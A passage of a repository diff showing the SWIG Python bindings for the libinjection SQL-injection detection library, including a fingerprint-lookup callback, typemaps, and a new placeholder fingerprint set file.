result = PyObject_CallObject((PyObject*) sf->userdata, arglist);
|
||||
Py_DECREF(arglist);
|
||||
if (result == NULL) {
|
||||
printf("GOT NULL\n");
|
||||
// python call has an exception
|
||||
// pass it back
|
||||
ch = '\0';
|
||||
} else {
|
||||
// convert value of python call to a char
|
||||
strtype = PyString_AsString(result);
|
||||
ch = strtype[0];
|
||||
Py_DECREF(result);
|
||||
}
|
||||
return ch;
|
||||
}
|
||||
|
||||
%}
|
||||
%include "typemaps.i"
|
||||
|
||||
// The C functions all start with 'libinjection_' as a namespace
|
||||
// We don't need this since it's in the libinjection python package
|
||||
// i.e. libinjection.libinjection_is_sqli --> libinjection.is_sqli
|
||||
//
|
||||
%rename("%(strip:[libinjection_])s") "";
|
||||
|
||||
// SWIG doesn't natively support fixed sized arrays.
|
||||
// this typemap converts the fixed size array sfilter.tokevec
|
||||
// into a list of pointers to stoken_t types. In otherword this code makes this example work
|
||||
// s = sfilter()
|
||||
// libinjection_is_sqli(s, "a string",...)
|
||||
// for i in len(s.pat):
|
||||
// print s.tokevec[i].val
|
||||
//
|
||||
|
||||
%typemap(out) stoken_t [ANY] {
|
||||
int i;
|
||||
$result = PyList_New($1_dim0);
|
||||
for (i = 0; i < $1_dim0; i++) {
|
||||
PyObject *o = SWIG_NewPointerObj((void*)(& $1[i]), SWIGTYPE_p_stoken_t,0);
|
||||
PyList_SetItem($result,i,o);
|
||||
}
|
||||
}
|
||||
|
||||
// automatically append string length into arg array
|
||||
%apply (char *STRING, size_t LENGTH) { (const char *s, size_t slen) };
|
||||
|
||||
%typemap(in) (ptr_lookup_fn fn, void* userdata) {
|
||||
if ($input == Py_None) {
|
||||
$1 = NULL;
|
||||
$2 = NULL;
|
||||
} else {
|
||||
$1 = libinjection_python_check_fingerprint;
|
||||
$2 = $input;
|
||||
}
|
||||
}
|
||||
%include "libinjection.h"
|
||||
%include "libinjection_sqli.h"
|
4
libinjection/python/libinjection/sqli_fingerprints.py
Normal file
4
libinjection/python/libinjection/sqli_fingerprints.py
Normal file
|
@ -0,0 +1,4 @@
|
|||
|
||||
sqli_fingerprints = set([
|
||||
'1234'
|
||||
])
|
Some files were not shown because too many files have changed in this diff Show more
Loading…
Reference in a new issue